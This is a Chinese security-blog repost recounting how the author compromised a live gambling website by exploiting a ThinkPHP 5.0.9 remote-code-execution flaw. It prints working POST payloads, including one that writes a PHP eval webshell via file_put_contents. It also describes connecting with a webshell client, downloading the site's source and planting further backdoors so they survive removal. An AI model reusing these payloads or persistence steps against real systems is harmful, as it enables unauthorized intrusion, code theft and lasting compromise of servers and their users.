【技术分享】简单的BC站点getshell

admin 2021年3月3日03:07:02评论169 views字数 871阅读2分54秒阅读模式

更多全球网络安全资讯尽在邑安全

最近来了点任务,做BC站,以前没做过只能碰碰运气!

确定目标
主站:

【技术分享】简单的BC站点getshell

通过旁站:

【技术分享】简单的BC站点getshell


信息收集
通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

【技术分享】简单的BC站点getshell

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

【技术分享】简单的BC站点getshell

发现是php 5.4.45版本的,

直接尝试getshell:

【技术分享】简单的BC站点getshell

发现system被禁用,尝试其他系统命令的也一样。

【技术分享】简单的BC站点getshell

查看phpinfo中desable_functions禁用了那些函数。

【技术分享】简单的BC站点getshell

想办法怎么绕过进行写马(此处卡了我半天)
最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。再次感谢小伙伴!

【技术分享】简单的BC站点getshell

getshell
构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

【技术分享】简单的BC站点getshell

写入成功,利用菜刀连接。

【技术分享】简单的BC站点getshell

成功连接。
查看权限:

【技术分享】简单的BC站点getshell

发现启动了远程安全模式。
想要绕过,发现很多函数被禁用,占未成功。
下载源码:

【技术分享】简单的BC站点getshell

多部署一些后门,防止被删。

原文来自: 先知社区

原文链接: https://xz.aliyun.com/t/9232

欢迎收藏并分享朋友圈,让五邑人网络更安全

【技术分享】简单的BC站点getshell

欢迎扫描关注我们,及时了解最新安全动态、学习最潮流的安全姿势!


推荐文章

1

新永恒之蓝?微软SMBv3高危漏洞(CVE-2020-0796)分析复现

2

重大漏洞预警:ubuntu最新版本存在本地提权漏洞(已有EXP) 



本文始发于微信公众号(邑安全):【技术分享】简单的BC站点getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月3日03:07:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【技术分享】简单的BC站点getshellhttps://cn-sec.com/archives/279189.html

发表评论

匿名网友 填写信息